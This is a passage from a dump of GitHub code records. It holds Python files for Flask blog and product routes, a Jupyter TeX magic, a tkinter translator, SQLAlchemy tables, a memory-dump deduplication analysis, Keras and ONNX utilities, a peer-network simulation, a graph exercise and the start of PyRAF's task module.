@bp.route('/create', methods=['GET', 'POST'])\n@login_required\ndef create():\n    \"\"\"\n    Endpoint: posts/create\n\n    Handles : GET, POST\n\n    Post creation page.\n    \"\"\"\n\n    if not current_user.is_authenticated:\n        flash('You are not logged in!', category='danger')\n        return redirect(url_for('auth.login'))\n\n    post_form = PostForm()\n\n    if post_form.validate_on_submit():\n        new_post = Post(author_id=current_user.id,\n                        title=post_form.title.data,\n                        body=post_form.body.data\n                        )\n        db.session.add(new_post)\n        db.session.commit()\n        flash('Post has been created!', category='info')\n        return redirect(url_for('index'))\n\n    return render_template('posts/create.html',\n                           form=post_form)\n\n\n@bp.route('/<int:id>/edit', methods=['GET', 'POST'])\n@login_required\ndef edit(id):\n    \"\"\"\n    Endpoint: posts/<int:id>/edit\n\n    Handles : GET, POST\n\n    Post editing page, author can change the contents of the post or delete it\n    \"\"\"\n\n    post = get_one_post(id)\n    post_form = PostForm()\n\n    if post_form.validate_on_submit():\n\n        if post_form.delete.data:\n            db.session.delete(post)\n            db.session.commit()\n            flash('Post has been deleted!', category='danger')\n            return redirect(url_for('index'))\n\n        post.title = post_form.title.data\n        post.body = post_form.body.data\n\n        db.session.commit()\n        flash('Post has been updated!', category='info')\n        next_page = request.args.get('next')\n\n        return redirect(next_page or url_for('posts.post_page', id=post.id) or url_for('index'))\n    else:\n        post_form.title.data = post.title\n        post_form.body.data = post.body\n    return render_template('posts/edit.html', form=post_form, post=post)\n\n\n@bp.route('/<int:id>/delete', methods=['POST', 'GET'])\n@login_required\ndef delete(id):\n    \"\"\"\n    Endpoint: posts/<int:id>/delete\n\n    Handles : GET, POST\n\n    API endpoint for deleting posts. Needs authorization of the poster\n    \"\"\"\n\n    post = get_one_post(id)\n\n    if current_user.id == post.author_id:\n        db.session.delete(post)\n        db.session.commit()\n        flash('Post has been deleted!', category='danger')\n        return redirect(url_for('index'))\n    flash('You cannot delete a post from someone else', category='danger')\n    return redirect(url_for('index'))\n\n\n@bp.route('/like/<int:post_id>/<action>')\n@login_required\ndef like_action(post_id, action):\n    \"\"\"\n    Endpoint: /like/<int:post_id>/<action>\n\n    Handles : GET\n\n    API endpoint for liking/unliking posts. Needs authorization of the poster\n    \"\"\"\n\n    post = Post.query.filter_by(id=post_id).first_or_404()\n\n    if action == 'like':\n        current_user.like_post(post)\n    elif action == 'unlike':\n        current_user.unlike_post(post)\n\n    db.session.commit()\n    return redirect(request.referrer)\n","repo_name":"Frozander/Chirper","sub_path":"chirper/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":5764,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"}
+{"seq_id":"26191242727","text":"from .. import db\nimport json\nimport logging\nfrom flask import redirect, url_for, Blueprint, render_template, request, jsonify, Response\nfrom ..models import Products\nimport random\n\nproducts_page = Blueprint('products', __name__)\n\n\n@products_page.route('/products')\ndef products():\n    page = request.args.get('id', default=None, type=int)\n    try:\n        data = Products.query.filter_by(id=page).first()\n        product = {\"name\": data.name, \"description\": data.description, \"price\": data.price,\n                   \"isAvailable\": data.isAvailable}\n        return product\n    except AttributeError:\n        return Response(\"Product with that id does not exist.\", 400)\n\n\n@products_page.route('/add_product', methods=['POST'])\ndef add_product_to_basket():\n    content_type = request.headers.get('Content-Type')\n    if (content_type != 'application/json'):\n        return jsonify({'message': 'Content-Type not supported!'})\n    json = request.json\n    name = json[\"name\"]\n    description = json[\"description\"]\n    price = json[\"price\"]\n    isAvailable = json[\"isAvailable\"]\n    new_product = Products(name=name, description=description, price=price, isAvailable=isAvailable)\n    try:\n        db.session.add(new_product)\n        db.session.commit()\n        res = jsonify({'message': f'product \"{name}\" added successfully',\n                       'product': json})\n        return (res, 201)\n    except AttributeError:\n        return {'message': 'Error'}, 499\n\n\n@products_page.route('/delete_product', methods=['DELETE'])\ndef delete_product_from_basket():\n    content_type = request.headers.get('Content-Type')\n    if (content_type != 'application/json'):\n        return 'Content-Type not supported!'\n    json = request.json\n    product = json['product']\n\n    return jsonify({'message': f'{product} was deleted successfully!', 'product': json}), 209\n","repo_name":"EgorRedkozubov/KostyanSite","sub_path":"website/pages/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"14072929838","text":"from __future__ import absolute_import\nfrom IPython.core.getipython import get_ipython\nfrom IPython.core.magic import (Magics, magics_class, cell_magic)\nimport sys\nfrom markdown import markdown\nfrom IPython.core.display import HTML\nchangeFormulaDict = [\n    (r'>',r'>'),\n    (r'<',r'<'),\n    (r'∑ (\\S+) (\\S+)',r'\\\\SUM{\\1}{\\2}'),\n    (r'S (\\S+) (\\S+)',r'\\\\INT{\\1}{\\2}'),\n    (r'(\\S+)/(\\S+)',r'\\\\frac{\\1}{\\2}'),\n    (r'§(\\S+)',r'\\\\oint_{\\1}'),\n    
(r'¬(\\S+)',r'\\\\overline{\\1}'),\n (r'・・(\\S+)',r'\\\\ddot{\\1}'),\n (r'・(\\S+)',r'\\\\dot{\\1}'),\n (r'lim (\\S+)',r'\\\\lim_{\\1}'),\n (r'hat (\\S+)',r'\\\\hat{\\1}'),\n (r'√(\\S+)',r'\\\\sqrt{\\1}'),\n (r'oo',r'\\\\infty '), \n (r'µ',r'\\\\mu '), \n (r'\\.∆',r'\\\\bigtriangledown '), \n (r'∆',r'\\\\bigtriangleup '), \n (r'pi',r' \\\\pi '),\n (r'forall',r' \\\\forall '),\n (r'ヨ',r' \\\\exists '),\n (r' in ',r' \\\\in '),\n (r'ø',r'\\\\theta'),\n (r'<=',r'≤'),\n (r'>=',r'≥'),\n (r'\\.a',r'\\\\alpha '), \n (r'\\.b',r'\\\\beta '), \n (r'\\.c',r'\\\\gamma '), \n (r'\\.d',r'\\\\delta '), \n (r'\\.e',r'\\\\epsilon '), \n (r'\\.E',r'\\\\xi '),\n (r'\\.l',r'\\\\lambda '), \n (r'\\.m',r'\\\\mu '), \n (r'\\.n',r'\\\\eta '), \n (r'\\.o',r'\\\\theta '), \n (r'\\.p',r'\\\\varphi '),\n (r'\\.r',r'\\\\rho '),\n (r'\\.t',r'\\\\tau '), \n (r'\\.u',r'\\\\upsilon '),\n (r'\\.v',r'\\\\nu '),\n (r'\\.w',r'\\\\omega '), \n (r'\\.s',r'\\\\sigma '), \n (r'\\.x',r'\\\\chi '),\n (r'\\.y',r'\\\\psi '),\n (r'\\.z',r'\\\\zeta '), \n (r'\\.\\|(\\S+)',r'\\mathbb{\\1}'),\n (r';(\\S)',r'\\mathbb{\\1}'),\n (r'\\.\\^(\\S+)',r'\\hat{\\1}'),\n (r'\\^(\\S+)',r'^{\\1}'),\n (r'_(\\S+)',r'\\\\zenkakuunderscore{\\1}'),\n\n # (r' ',r'\\\\,'),\n (r'->',r'\\\\rightarrow '), \n (r'\\!\\{',r'\\\\left\\\\{ \\\\begin{array}{ll}'),\n (r'\\!\\(',r'\\\\left( \\\\begin{array}{ll}'),\n (r'\\!\\.',r'\\\\left\\\\. \\\\begin{array}{ll}'),\n (r'\\!}',r'\\\\end{array} \\\\right.'),\n (r'\\!\\)',r'\\\\end{array} \\\\right)'),\n (r' or ',r' \\\\\\\\ '),\n]\nchangeJpDict = [\n (r'#',r'#'),\n (r' ',r' '),\n (r'・',r'- ')\n]\n# optDict = \"6:§, v:√, ^:≠ , j:∆, x:≈, m:µ, ~:±, o:ø, O:Ø, P:∏ 4:¢c:ç\"\nimport re\ndef replaceAll(k,v,code,i = 0):\n replaced = re.sub(k,v,code) \n return replaced\n #if replaced == code or i > 10: return code \n #return replaceAll(k,v,replaced,i + 1)\n\ndef te(code) : return tex(code,'$')\ndef p(code) : return te(code)\ndef P(code) : return tex(code)\ndef tex(code,doller = \"$$\") : \n for k,v in changeFormulaDict:\n code = re.sub(k,v,code)\n return ( doller + code + doller)\n\n\n \n@magics_class\nclass MarkdownMagics(Magics):\n @cell_magic \n def m(self, line, cell):\n # 日本語または全角:マークダウン\n # 半角アルファベット:数式\n cell = self.toMD72(cell)\n #return cell\n return HTML(\"
{}
\".format(markdown(cell, extensions=['markdown.extensions.extra'])))\n def toMD72(self,code): \n formulaAlphabet = r'a-zA-Z0-9\\t\\r\\f\\v \\-[\\]!\"#$%&()=~^|@`{}+;*:<,>.?/ø∑ç√§δ'\n formulaAlphabets = r'([' + formulaAlphabet + r']{2,})' \n notFormulaAlphabets = r'([^' + formulaAlphabet + r']+)' \n code = re.sub(formulaAlphabets,r'$ \\1 $',code)\n for k,v in changeFormulaDict:\n code = replaceAll(k,v,code)\n #code = re.sub(k,v,code) \n for k,v in changeJpDict:\n code = re.sub(k,v,code)\n #for k,v in changeFormulaDict:\n #m = re.match(formulaAlphabets,code) \n return code\n \nget_ipython().register_magics(MarkdownMagics)\n\n#ESC-A-M :: MarkdownCell\n\n\"Python Definition\"","repo_name":"Muratam/dotfiles","sub_path":"module/python3/jupyterlib72.py","file_name":"jupyterlib72.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"73078158543","text":"import tkinter as tk\r\nfrom translate import Translator\r\n\r\ndef translate_text():\r\n text = text_entry.get()\r\n if text:\r\n translator = Translator(to_lang='hi')\r\n translation = translator.translate(text)\r\n translated_text.set(translation)\r\n\r\n# main application window\r\nroot = tk.Tk()\r\nroot.title(\"Language Translator\")\r\n\r\n# widgets\r\ntext_entry = tk.Entry(root, width=50)\r\ntext_entry.pack(pady=10)\r\ntranslate_button = tk.Button(root, text=\"Translate\", command=translate_text)\r\ntranslate_button.pack(pady=5)\r\ntranslated_text = tk.StringVar()\r\nresult_label = tk.Label(root, textvariable=translated_text, wraplength=400, justify=\"center\", bg=\"lightgray\")\r\nresult_label.pack(pady=10)\r\n\r\nroot.mainloop()","repo_name":"mihirchandna/translator-python-gui","sub_path":"proj.py","file_name":"proj.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19208868819","text":"from sqlalchemy import Column, MetaData, Table, create_engine, Sequence\nfrom sqlalchemy.dialects import postgresql\nfrom databases import Database\nfrom app.api.settings import getConfig\n\ncnf = getConfig()\n\nDATABASE_URL = \"postgresql://{0}:{1}@{2}:{3}/{4}\".format(\n cnf.DB_USER, cnf.DB_PASS, cnf.DB_HOST, cnf.DB_PORT, cnf.DB_DATABASE\n)\n\nengine = create_engine(DATABASE_URL)\nmetadata = MetaData()\n\nfile_process_log = Table(\n \"file_process_log\",\n metadata,\n Column(\n \"file_process_id\",\n postgresql.VARCHAR(100),\n primary_key=True,\n ),\n Column(\"fp_id\", postgresql.BIGINT),\n Column(\"filename\", postgresql.VARCHAR(100)),\n Column(\"source_ip\", postgresql.VARCHAR(15)),\n Column(\"file_size\", postgresql.BIGINT),\n Column(\"bucket_name\", postgresql.VARCHAR(100)),\n Column(\"event_name\", postgresql.VARCHAR(100)),\n Column(\"event_ts\", postgresql.TIMESTAMP),\n Column(\"file_hash\", postgresql.VARCHAR(100)),\n Column(\"create_by\", postgresql.VARCHAR(20)),\n Column(\"create_ts\", postgresql.TIMESTAMP),\n)\n\nfile_process_step_log = Table(\n \"file_process_step_log\",\n metadata,\n Column(\"step_id\", postgresql.BIGINT, Sequence(\"step_seq\"), primary_key=True),\n Column(\"file_process_id\", postgresql.VARCHAR(100)),\n Column(\"step_name\", postgresql.VARCHAR(100)),\n Column(\"step_status\", postgresql.VARCHAR(50)),\n Column(\"step_status_detail\", postgresql.TEXT),\n Column(\"step_start_ts\", postgresql.TIMESTAMP),\n Column(\"step_end_ts\", postgresql.TIMESTAMP),\n Column(\"create_by\", postgresql.VARCHAR(20)),\n Column(\"create_ts\", 
postgresql.TIMESTAMP),\n)\n\ndatabase = Database(DATABASE_URL)\n","repo_name":"krishnanaredla/fr-ms","sub_path":"app/api/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"19511332421","text":"\"\"\"Takes in the paths of two directories and reads all dump files. Computes SHA-1 hashes of the dumped pages and performs analysis\"\"\"\nimport os\nimport sys\nimport hashlib\n\n\ndef compute_hash(chunk):\n    hash_obj = hashlib.sha1(chunk)\n    hash = hash_obj.hexdigest()\n    return hash\n\n\ndef get_statistics_subpage(hash_table):\n    # print('Total hashes in hash table: ' + str(len(hash_table)))\n    count = 0\n    for key in hash_table:\n        num_chunks = len(hash_table[key])\n        count += num_chunks\n\n    # print('Total chunks: ' + str(count))\n    return count\n\n\ndef get_common_chunks(table1, total1, table2, total2):\n    common_hashes = list(set(table1.keys()) & set(table2.keys()))\n    # print('Total Common Hashes: ' + str(len(common_hashes)))\n\n    # print('Breakdown:')\n    tuples_count = {}\n    count1 = 0\n    count2 = 0\n    common_pages1 = []\n    common_pages2 = []\n    for key in common_hashes:\n        num_chunks1 = len(table1[key])\n        num_chunks2 = len(table2[key])\n        count1 += num_chunks1\n        count2 += num_chunks2\n        # if (num_chunks1 > 100 and num_chunks2 > 100):\n        # print(key, num_chunks1, num_chunks2)\n        common_pages1.extend(table1[key])\n        common_pages2.extend(table2[key])\n        number_tuple = '(' + str(num_chunks1) + ' ' + str(num_chunks2) + ')'\n        if number_tuple in tuples_count:\n            tuples_count[number_tuple] += 1\n        else:\n            tuples_count[number_tuple] = 1\n\n    # print('Chunks in Table 1 that are common: ' + str(count1) + ', ' +\n    # str(float(count1) / total1))\n    # print('Chunks in Table 2 that are common: ' + str(count2) + ', ' +\n    # str(float(count2) / total2))\n    percent1 = float(count1) / total1\n    percent2 = float(count2) / total2\n    return percent1, percent2\n\n\ndef read_dumps(dir, num_hashes, chunk_size):\n    table = {}\n    page_id = 0\n\n    for subdir, _, files in os.walk(dir):\n        for file in files:\n            zero_fp = 0\n            if file[:5] == \"pages\":\n                filename = os.path.join(subdir, file)\n                num_pages = 0\n\n                # Read the binary file\n                fo = open(filename, \"rb\")\n                mem = fo.read()\n                if mem:\n                    chunks_found = 0\n                    for i in range(len(mem) - chunk_size + 1):\n                        start = i\n                        end = i + chunk_size\n                        chunk = mem[start:end]\n\n                        # Compute hash\n                        hash = compute_hash(chunk)\n                        # Insert into table\n                        # if hash != \"0b8bf9fc37ad802cefa6733ec62b09d5f43a1b75\":\n                        chunks_found += 1\n                        if hash in table:\n                            table[hash].append(page_id)\n                        else:\n                            table[hash] = [page_id]\n\n                        if chunks_found == num_hashes:\n                            break\n\n    return table\n\n
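# Note (illustrative): read_dumps above hashes every overlapping chunk_size-byte\n# window (stride 1), while read_dumps_rabin below samples one window every\n# period (= 2 * chunk_size) bytes and stores the full period-byte span so that\n# get_redundancy_rabin can verify candidate matches byte-for-byte.\n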
def read_dumps_rabin(dir, num_hashes, chunk_size):\n    table = {}\n    period = 2 * chunk_size\n\n    for subdir, _, files in os.walk(dir):\n        for file in files:\n            if file[:5] == \"pages\":\n                filename = os.path.join(subdir, file)\n                num_pages = 0\n\n                # Read the binary file\n                fo = open(filename, \"rb\")\n                mem = fo.read()\n                if mem:\n                    chunks_found = 0\n                    start = 0\n                    while start < len(mem) - period + 1:\n                        chunk = mem[start:start + chunk_size]\n                        match_chunk = mem[start:start + period]\n\n                        # Compute hash\n                        hash = compute_hash(chunk)\n                        # Insert into table\n                        # if hash != \"0b8bf9fc37ad802cefa6733ec62b09d5f43a1b75\":\n                        chunks_found += 1\n                        if hash in table:\n                            flag = False\n                            for matching_chunk in table[hash]:\n                                if matching_chunk == match_chunk:\n                                    flag = True\n                                    break\n                            if not flag:\n                                table[hash].append(match_chunk)\n                        else:\n                            table[hash] = [match_chunk]\n\n                        if chunks_found == num_hashes:\n                            break\n\n                        start += period\n\n    return table\n\n\ndef get_redundancy_rabin(dir, chunk_size, ref_table):\n    period = 2 * chunk_size\n    # accumulate across all dump files; initializing these inside the file\n    # loop would reset the counts for every file (and can divide by zero)\n    duplicate_bytes = 0\n    total_bytes = 0\n    for subdir, _, files in os.walk(dir):\n        for file in files:\n            if file[:5] == \"pages\":\n                filename = os.path.join(subdir, file)\n\n                # Read the binary file\n                fo = open(filename, \"rb\")\n                mem = fo.read()\n                if mem:\n                    total_bytes += len(mem)\n                    start = 0\n                    while start < len(mem) - period + 1:\n                        chunk = mem[start:start + chunk_size]\n                        match_chunk = mem[start:start + period]\n\n                        # Compute hash\n                        hash = compute_hash(chunk)\n                        # Insert into table\n                        # if hash != \"0b8bf9fc37ad802cefa6733ec62b09d5f43a1b75\":\n                        if hash in ref_table:\n                            max_length = 0\n                            for matching_chunk in ref_table[hash]:\n                                match_length = 0\n                                if matching_chunk[:chunk_size] == chunk:\n                                    # Check the remaining bytes\n                                    match_length = chunk_size\n                                    for i in range(period - chunk_size):\n                                        if matching_chunk[chunk_size +\n                                                          i] == match_chunk[\n                                                              chunk_size + i]:\n                                            match_length += 1\n                                        else:\n                                            break\n                                if match_length > max_length:\n                                    max_length = match_length\n                            duplicate_bytes += max_length\n\n                        start += period\n\n    return float(duplicate_bytes) / total_bytes\n\n\ndef calc(name1, name2, chunk_size):\n    table1 = read_dumps(name1, 5000000, chunk_size)\n    table2 = read_dumps(name2, 5000000, chunk_size)\n\n    count1 = get_statistics_subpage(table1)\n    count2 = get_statistics_subpage(table2)\n    p1, p2 = get_common_chunks(table1, count1, table2, count2)\n    print(p1, p2)\n    return p1, p2\n\n\ndef calc_rabin(name1, name2, chunk_size):\n    table2 = read_dumps_rabin(name2, 5000000, chunk_size)\n    p1 = get_redundancy_rabin(name1, chunk_size, table2)\n\n    table1 = read_dumps_rabin(name1, 5000000, chunk_size)\n    p2 = get_redundancy_rabin(name2, chunk_size, table1)\n\n    print(p1, p2)\n    return p1, p2\n","repo_name":"utnslab/Medes","sub_path":"motivation/calc_dedup.py","file_name":"calc_dedup.py","file_ext":"py","file_size_in_byte":7249,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"}
+{"seq_id":"33072736162","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 14 01:32:48 2018\n\n@author: thinkpad\n\"\"\"\n\nimport keras.backend as K\nimport numpy as np\n\n\nclass Flattener(object):\n    \n    def __init__(self, variables):\n        self.variables = variables        \n        assert type(variables) == list\n        self.shapes = list(map(K.int_shape, variables))\n        self.get_op = K.concatenate([K.flatten(x) for x in self.variables])\n        start = 0\n        self.idx = []\n        for s in self.shapes:\n            size = np.prod(s)\n            self.idx.append((start,start + size))\n            start += size\n        self.total_size = start\n        \n    def get_value(self):\n        return K.get_value(self.get_op)\n\n    def set_value(self,theta):\n        assert theta.shape == (self.total_size,)\n        theta = np.array(theta,dtype='float32')\n        \n        for i,v in enumerate(self.variables):\n            \n            K.set_value(v, np.reshape(\n                theta[self.idx[i][0]:self.idx[i][1]], self.shapes[i]))\n    def get(self):\n        return self.get_op    \n\n    def flatgrad(self,loss):\n        grads = K.gradients(loss, self.variables)\n        return K.concatenate([K.flatten(g) for g in grads])\n    \n","repo_name":"aghriss/DeepRL","sub_path":"base/flattener.py","file_name":"flattener.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"7913063949","text":"from peer import Peer\nfrom simulation import Simulation, BINS\nfrom histogram import compute_histogram_bins, 
plot_histogram\n\nclass PeerQ2(Peer):\n\n def send_data_to_backend(self):\n \"\"\"\n Question 2:\n This method should return an _array_ of the peer's\n connection durations.\n \"\"\"\n return self.peer_pool.values()\n\n\nclass SimulationQ2(Simulation):\n\n def generate_network(self):\n self.network = [PeerQ2() for _ in range(self.number_of_peers)]\n\n def process_backend_data(self):\n \"\"\"\n Question 2:\n This method should do all necessary processing to return\n the connection durations histogram bins counts.\n Don't call `plot_histogram` in this method, we just want\n to compute the histogram bins counts!\n \"\"\"\n durations = [duration for peer in self.network for duration in peer.send_data_to_backend()]\n return compute_histogram_bins(durations, BINS)\n\n\nif __name__ == \"__main__\":\n\n s = SimulationQ2(number_of_peers=10, max_peer_pool_size=2)\n s.run()\n s.report_result()\n\n s = SimulationQ2(number_of_peers=1000, max_peer_pool_size=10)\n s.run()\n s.report_result()\n\n s = SimulationQ2(number_of_peers=1000, max_peer_pool_size=100)\n s.run()\n s.report_result()\n\n s = SimulationQ2(number_of_peers=1000, max_peer_pool_size=1000)\n s.run()\n s.report_result()\n\n\n s = SimulationQ2(number_of_peers=10000, max_peer_pool_size=10)\n s.run()\n s.report_result()\n\n s = SimulationQ2(number_of_peers=10000, max_peer_pool_size=100)\n s.run()\n s.report_result()\n\n s = SimulationQ2(number_of_peers=10000, max_peer_pool_size=1000)\n s.run()\n s.report_result()\n","repo_name":"yihohu/sr_exercice","sub_path":"question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71835787662","text":"import os\nfrom pathlib import Path\nimport sys\nimport torch\nimport torch.onnx\nimport onnx\nfrom transformers import BertTokenizer\nimport yaml\n\nsys.path.append(str(Path(__file__).parent.parent.absolute()))\nfrom model import MultiClassLabelModel\n\n\nclass DS2Onnx():\n def __init__(self, input_model, output_model, device_id=0, config_file='configs/train.yaml') -> None:\n with open(config_file, 'r') as f:\n self.cfg = yaml.load(f, Loader=yaml.FullLoader)\n \n self.input_model = input_model\n self.output_model = output_model\n self.device = torch.device(f\"cuda:{device_id}\" if torch.cuda.is_available() else \"cpu\")\n \n def load_model(self, ):\n self.model = MultiClassLabelModel(base_model_path=self.cfg[\"base_model_path\"], label_num=self.cfg[\"label_num\"])\n \n self.model.load_state_dict(torch.load(self.input_model, map_location=self.device), strict=True)\n \n self.model.to(self.device)\n self.model.eval()\n \n def dataset(self, ):\n tokenizer = BertTokenizer.from_pretrained(self.cfg[\"base_token_path\"])\n \n sample_text = \"北京币石景山区石景山学校\"\n \n inputs = tokenizer(sample_text, add_special_tokens=True, padding='max_length', truncation=True, max_length=self.cfg[\"max_len\"], return_tensors='pt')\n \n dummy_input = tuple(value.to(self.device) for value in inputs.values())\n \n input_name_list = list(inputs.keys())\n print(\"input_name_list: \", input_name_list)\n \n return dummy_input, input_name_list\n \n def check_onnx(self, ):\n onnx_model = onnx.load(self.output_model)\n try:\n onnx.checker.check_model(onnx_model)\n print(\"onnx model check ok!\")\n except onnx.checker.ValidationError as e:\n print(f\"model is invalid: {e}\")\n \n def __call__(self, ):\n dir_name = os.path.dirname(self.output_model)\n if dir_name and not os.path.exists(dir_name):\n 
os.makedirs(dir_name)\n\n self.load_model()\n \n dummy_input, input_name_list = self.dataset()\n\n output_name_list = [\"labels\"]\n \n torch.onnx.export(self.model,\n dummy_input,\n self.output_model,\n export_params=True,\n opset_version=self.cfg[\"onnx_version\"],\n do_constant_folding=True,\n input_names=input_name_list,\n output_names=output_name_list,\n dynamic_axes={input_name: {0: \"batch\", 1: \"seq\"} for input_name in input_name_list},\n verbose=False)\n print('模型已转为ONNX==>', self.output_model)\n self.check_onnx()\n\n\nif __name__ == \"__main__\":\n input_model = \"xxx.pt\"\n output_model = \"api_model/onnx/2/best_model.onnx\"\n ds2onnx = DS2Onnx(input_model, output_model)\n ds2onnx()\n","repo_name":"awesome-yyh/yyh-util","sub_path":"deepLearning/inference/onnx/ds2onnx.py","file_name":"ds2onnx.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"32249558424","text":"# 백준 9372번 상근이의 여행\n# SILVER 4\n# 알고리즘 분류 : 그래프 이론, 트리\n# DFS로 순회하는 횟수를 세서 출력\n# 모든 그래프가 연결되어 있기 때문에 N-1을 출력해도 된다\nimport sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\nT = int(input())\ndef dfs(v) :\n global cnt\n cnt += 1\n check[v] = 1\n for i in g[v] :\n if not check[i] :\n dfs(i)\nfor _ in range(T) :\n cnt = 0\n N,M = map(int,input().split())\n g = [[] for _ in range(N+1)]\n check = [0]*(N+1)\n for i in range(M) :\n a,b = map(int,input().split())\n g[a].append(b)\n g[b].append(a)\n dfs(1)\n print(cnt-1)","repo_name":"optshj/Baekjoon-Python","sub_path":"SILVER/9372.py","file_name":"9372.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19003062236","text":"\"\"\"module iraftask.py -- defines IrafTask and IrafPkg classes\n\nR. White, 2000 June 26\n\niraftask defines the original PyRAF task functionality which pre-dates\nthe creation of IRAF ECL. irafecl is closely related and derived from\niraftask, providing drop-in replacements for the Task classes defined\nhere which also support ECL syntax like \"iferr\" and $errno.\n\"\"\"\n\n\nimport fnmatch\nimport os\nimport sys\nimport copy\nimport re\nfrom .tools import basicpar, irafglobals\nfrom .tools.irafglobals import IrafError, Verbose\nfrom . import subproc\nfrom . import irafinst\nfrom . import irafpar\nfrom . import irafexecute\nfrom . import cl2py\nfrom . import iraf\nfrom .tools import minmatch, irafutils, taskpars\n\n# may be set to function to monitor task execution\n# function gets called for every task execution\nexecutionMonitor = None\n\n# -----------------------------------------------------\n# IRAF task class\n# -----------------------------------------------------\n\n# basic IrafTask attributes\n_IrafTask_attr_dict = {\n '_name': None,\n '_pkgname': None,\n '_pkgbinary': None,\n '_hidden': 0,\n '_hasparfile': 1,\n '_tbflag': 0,\n # full path names and parameter list get filled in on demand\n '_fullpath': None,\n # parameters have a current set of values and a default set\n '_currentParList': None,\n '_defaultParList': None,\n '_runningParList': None,\n '_currentParpath': None,\n '_defaultParpath': None,\n '_scrunchParpath': None,\n '_parDictList': None,\n '_foreign': 0,\n}\n\n# This is a list of all the IrafTask objects that have been created.\n# There are variables in iraffunctions that superficially\n# resemble this, but none of them contain the complete list, so I\n# keep it here. 
This is currently used only for the \"taskinfo\"\n# operation.\n#\n# We generally approach this list interactively and with a wildcards.\n# I don't see any particularly useful indexing, so it is just a plain\n# linear search.\n#\nall_task_definitions = []\n\n# use empty \"tag\" class from irafglobals as base class\n\n\nclass IrafTask(irafglobals.IrafTask, taskpars.TaskPars):\n \"\"\"IRAF task class\"\"\"\n\n # We remember parameters to the __init__ function\n #\n # prefix\n # ? - see obj._saved_prefix\n #\n # name\n # the name of the task. We don't actually save this, but\n # obj._name contains the name as we may have modified it.\n #\n # suffix\n # ? - see obj._saved_suffix\n #\n # filename\n # ? - obviously more than just a file name. obj._filename\n # is the modified value\n #\n # pkgname\n # the name of the package that this task is in. see obj._pkgname\n #\n # pkgbinary\n # places that the binary may be. see obj._pkgbinary\n #\n\n def __init__(self, prefix, name, suffix, filename, pkgname, pkgbinary):\n\n # for this heavily used code, pull out the dictionary and\n # initialize it directly to avoid calls to __setattr__\n #\n # b.t.w. do not try to set the attributes directly - it doesn't\n # work. (not sure if that is a bug or a \"feature\")\n objdict = self.__dict__\n\n # remember the task definition in case we want to see it later\n all_task_definitions.append(self)\n\n objdict['_saved_suffix'] = suffix\n objdict['_saved_prefix'] = prefix\n\n # stuff all the parameters into the object\n objdict.update(_IrafTask_attr_dict)\n sname = name.replace('.', '_')\n if sname != name:\n print(\"Warning: '.' illegal in task name, changing\", name, \"to\",\n sname)\n spkgname = pkgname.replace('.', '_')\n if spkgname != pkgname:\n print(\"Warning: '.' illegal in pkgname, changing\", pkgname, \"to\",\n spkgname)\n objdict['_name'] = sname\n objdict['_pkgname'] = spkgname\n objdict['_pkgbinary'] = []\n self.addPkgbinary(pkgbinary)\n # tasks with names starting with '_' are implicitly hidden\n if name[0:1] == '_':\n objdict['_hidden'] = 1\n if prefix == '$':\n objdict['_hasparfile'] = 0\n if suffix == '.tb':\n objdict['_tbflag'] = 1\n if filename and filename[0] == '$':\n # this is a foreign task\n objdict['_foreign'] = 1\n objdict['_filename'] = filename[1:]\n # handle weird syntax for names\n if self._filename == 'foreign':\n objdict['_filename'] = name\n elif self._filename[:8] == 'foreign ':\n objdict['_filename'] = name + self._filename[7:]\n elif filename[:2] == '$0':\n objdict['_filename'] = name + filename[2:]\n else:\n objdict['_filename'] = filename\n\n def initTask(self, force=0):\n \"\"\"Fill in full pathnames of files and read parameter file(s)\n\n Force indicates whether shortcut initialization can be used\n or not. (No difference for base IrafTask.)\n \"\"\"\n if self._filename and not self._fullpath:\n if irafinst.EXISTS:\n self._initFullpath() # allow to throw on error\n else: # be more accommodating\n try:\n self._initFullpath()\n except IrafError:\n self._initNoIrafTask()\n if self._currentParList is None:\n self._initParpath()\n self._initParList()\n\n def _initNoIrafTask(self):\n \"\"\" Special-case handle the initialization that is going awry due\n to a missing IRAF installation. 
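Illustrative example\n        (hypothetical filename): a task file 'bin$x_images.e' that cannot be\n        expanded would be remapped here to f'{irafinst.NO_IRAF_PFX}/x_images.e'.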
\"\"\"\n # Handle non-IRAF installs - could not find the file anywhere\n # Handle .par files differently from other types\n orig = self._filename\n base = os.path.basename(self._filename)\n base = base[1 + base.rfind('$'):]\n self._filename = f'{irafinst.NO_IRAF_PFX}/{base}'\n if Verbose > 1:\n print('Task \"' + self._name + '\" needed \"' + orig + '\" got: ' +\n self._filename)\n\n # =========================================================\n # public accessor methods for attributes\n # =========================================================\n\n # ---------------------------------------------------------\n # first set returns current values (which may be None if\n # initTask has not been executed yet)\n # ---------------------------------------------------------\n\n def getName(self):\n return self._name\n\n def getPkgname(self):\n return self._pkgname\n\n def getPkgbinary(self):\n return self._pkgbinary\n\n def isHidden(self):\n return self._hidden\n\n def hasParfile(self):\n return self._hasparfile\n\n def getTbflag(self):\n return 